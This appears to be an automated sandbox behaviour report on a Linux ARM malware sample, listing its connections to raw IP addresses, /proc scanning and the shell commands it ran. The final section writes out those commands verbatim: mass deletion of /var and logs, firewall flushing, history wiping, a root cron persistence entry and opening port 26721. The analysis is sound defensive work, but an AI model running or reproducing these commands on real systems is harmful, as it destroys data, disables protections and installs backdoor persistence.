Source: unknown |
TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 51.77.149.139 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 194.36.144.87 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 134.195.4.2 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 185.181.61.24 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/php/.. |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.cache |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.cache |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.config |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.config |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.local |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/gdm3/.local |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/snapd/assertions/asserts-v0/.. |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/snapd/assertions/.. |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/snapd/.. |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/colord/.cache |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants |
Jump to behavior |
Source: /usr/bin/rm (PID: 5437) |
Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/230/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/230/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/110/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/110/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/231/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/231/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/111/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/111/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/232/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/232/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/112/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/112/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/233/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/233/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/113/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/113/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/234/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/234/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/114/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/114/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/235/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/235/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/115/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/115/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/236/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/236/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/116/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/116/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/237/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/237/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/117/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/117/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/238/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/238/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/118/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/118/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/239/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/239/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/119/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/119/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3633/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3633/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/914/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/914/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/10/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/10/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/917/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/917/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/11/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/11/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/12/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/12/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/5273/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/5273/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/13/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/13/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/14/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/14/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/15/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/15/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/16/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/16/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/17/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/17/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/18/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/18/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/19/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/19/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/240/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/240/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3095/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3095/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/120/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/120/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/241/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/241/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/121/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/121/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/242/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/242/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/1/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/1/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/122/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/122/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/243/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/243/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/2/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/2/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/123/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/123/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/244/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/244/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/3/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/124/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/124/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/245/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/245/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/1588/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/1588/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/125/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/125/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/4/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/4/cmdline |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/246/status |
Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) |
File opened: /proc/246/cmdline |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5435) |
Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5441) |
Shell command executed: /bin/sh -c "rm -rf /tmp/*" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5444) |
Shell command executed: /bin/sh -c "iptables -F" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5450) |
Shell command executed: /bin/sh -c "pkill -9 busybox" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5464) |
Shell command executed: /bin/sh -c "pkill -9 perl" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5469) |
Shell command executed: /bin/sh -c "pkill -9 python" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5472) |
Shell command executed: /bin/sh -c "service iptables stop" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5482) |
Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5486) |
Shell command executed: /bin/sh -c "service firewall stop" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5517) |
Shell command executed: /bin/sh -c "history -c" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5519) |
Shell command executed: /bin/sh -c "rm -rf ~/.bash_history" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5522) |
Shell command executed: /bin/sh -c "history -w" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5532) |
Shell command executed: /bin/sh -c "chmod +x /dev/ocmount" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5535) |
Shell command executed: /bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5537) |
Shell command executed: /bin/sh -c /dev/ocmount |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5592) |
Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5639) |
Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5645) |
Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5652) |
Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5658) |
Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5548) |
Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5637) |
Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5643) |
Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5648) |
Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |
Source: /tmp/arm7.elf (PID: 5654) |
Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" |
Jump to behavior |